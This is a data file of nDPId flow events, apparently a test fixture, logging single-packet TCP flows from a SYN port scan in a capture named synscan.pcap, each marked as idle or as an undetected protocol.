-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3986,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3986,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8083,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3986,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3986,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8084,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8083,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8084,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8085,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8085,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8086,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1043,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1043,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8086,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8088,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8088,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1094,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8089,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1094,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8089,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1947,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1947,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3995,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 